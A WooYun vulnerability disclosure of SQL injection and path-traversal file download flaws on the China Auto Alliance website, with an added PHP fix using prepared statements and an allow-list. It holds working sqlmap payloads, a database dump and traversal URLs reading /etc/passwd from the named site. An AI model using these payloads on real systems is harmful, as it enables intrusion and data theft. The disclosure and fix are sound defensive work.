
Vulnerability summary

Defect ID: wooyun-2014-059696

Title: SQL injection and arbitrary file download vulnerabilities on the China Auto Alliance (中车联盟) website

Vendor: 中车联盟 (China Auto Alliance)

Author: piza_M

Submitted: 2014-05-06 19:16

Fix deadline: 2014-06-20 19:16

Published: 2014-06-20 19:16

Vulnerability type: SQL injection

Severity: Medium

Self-assessed Rank: 10

Status: vendor could not be reached, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2014-05-06: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed.
2014-06-20: The vendor has actively ignored the vulnerability; details disclosed to the public.

Brief description:

The China Auto Alliance website has an SQL injection vulnerability and an arbitrary file download vulnerability.

Detailed description:

Issue 1: SQL injection
Injectable parameter: searchword

[root@Hacker~]# Sqlmap -u "http://www.aachina.net/search.php?search=search&searchword=4Cub3IhuFH6"
---
Place: GET
Parameter: searchword
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: search=search&searchword=4Cub3IhuFH6' AND (SELECT 7835 FROM(SELECT
COUNT(*),CONCAT(0x3a6d666a3a,(SELECT (CASE WHEN (7835=7835) THEN 1 ELSE 0 END)),
0x3a6b6d6f3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY
x)a) AND 'ugoP'='ugoP
Type: UNION query
Title: MySQL UNION query (NULL) - 12 columns
Payload: search=search&searchword=4Cub3IhuFH6' LIMIT 1,1 UNION ALL SELECT NU
LL, CONCAT(0x3a6d666a3a,0x4f62526d7a6e696a6146,0x3a6b6d6f3a), NULL, NULL, NULL,
NULL, NULL, NULL, NULL, NULL, NULL, NULL#
---
[17:43:49] [INFO] testing MySQL
[17:43:49] [WARNING] reflective value(s) found and filtering out
[17:43:49] [INFO] confirming MySQL
[17:43:50] [INFO] the back-end DBMS is MySQL
[17:43:50] [INFO] fetching banner
[17:43:51] [INFO] actively fingerprinting MySQL
[17:43:51] [INFO] heuristics detected web page charset 'utf-8'
[17:43:52] [INFO] executing MySQL comment injection fingerprint
web server operating system: Linux CentOS
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
banner: '5.1.69'
[17:44:27] [INFO] fetching database users
database management system users [1]:
[*] 'aachina'@'localhost'
[17:44:28] [INFO] fetching database names
available databases [3]:
[*] db_aachina
[*] information_schema
[*] test
[17:55:12] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
[17:55:12] [INFO] fetching database names
[17:55:12] [INFO] fetching tables for databases: 'db_aachin
, test'
[17:55:13] [WARNING] reflective value(s) found and filterin
Database: db_aachina
[24 tables]
+---------------------------------------+
| gwi_admin |
| gwi_adminlog |
| gwi_channel |
| gwi_comment |
| gwi_failedlogin |
| gwi_file |
| gwi_file_class |
| gwi_form |
| gwi_formdata |
| gwi_gbook |
| gwi_group |
| gwi_info |
| gwi_info_class |
| gwi_info_content |
| gwi_keyword |
| gwi_link |
| gwi_member |
| gwi_photo |
| gwi_photo_class |
| gwi_rel_comkey |
| gwi_rel_key |
| gwi_settings |
| gwi_styles |
| gwi_templates |
+---------------------------------------+


Issue 2: arbitrary file download
http://www.aachina.net/user.php?action=../../../../../../../../../../etc/passwd%00.jpg
http://www.aachina.net/user.php?action=../../../../../../../../../../etc/hosts%00.jpg


Proof of vulnerability:

Already demonstrated above.

Fix recommendation:

Filter the parameters.
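Since the report only says "filter the parameters", the following added example (not the site's code and not from the original report) shows what a robust fix for the two issues looks like in PHP: the searchword value is bound through a prepared statement instead of being concatenated into SQL, and the user.php action parameter is mapped onto an allow-list instead of being used as a file path. The table gwi_info, its title column, the action names and the user/ directory are assumptions for illustration.

```php
<?php
// Added example (not the site's code). Table/column names, action names
// and the user/ directory are assumptions for illustration.

// Issue 1: searchword must never be concatenated into the SQL text.
// A prepared statement keeps the value as data, so quotes, UNION and
// AND ... clauses cannot change the query's structure.
function search_info(PDO $db, string $searchword): array
{
    $stmt = $db->prepare(
        'SELECT id, title FROM gwi_info WHERE title LIKE :kw LIMIT 50'
    );
    // Escape LIKE metacharacters so % and _ in user input match literally.
    $pattern = '%' . addcslashes($searchword, '%_\\') . '%';
    $stmt->bindValue(':kw', $pattern, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Issue 2: user.php?action=... was turned into a file path. Rather than
// stripping "../", map the parameter onto a fixed allow-list so the client
// never chooses a path component at all.
function resolve_action_file(string $action): ?string
{
    static $allowed = [            // assumed action names
        'login'    => 'login.php',
        'register' => 'register.php',
        'profile'  => 'profile.php',
    ];
    // Plain lowercase letters only: this rejects "../", "%00" (null byte)
    // and fake extensions before any filesystem call is made.
    if (!preg_match('/^[a-z]{1,32}$/', $action) || !isset($allowed[$action])) {
        return null;
    }
    $base = realpath(__DIR__ . '/user');               // assumed directory
    $path = realpath($base . '/' . $allowed[$action]);
    // Defence in depth: the resolved path must still sit under $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if ($path === false || strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $path;
}

// Constructed usage: a traversal-style value is rejected with null.
var_dump(resolve_action_file("../../../../etc/passwd\0.jpg"));
```

Logging the rejected value of action (with the null byte and path separators made visible) is also worthwhile, since a request for /etc/passwd from user.php is a clear detection signal.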

Copyright notice: please credit the source, piza_M@WooYun, when reposting.


Vulnerability response

Vendor response:

The vendor could not be reached, or the vendor actively declined to respond.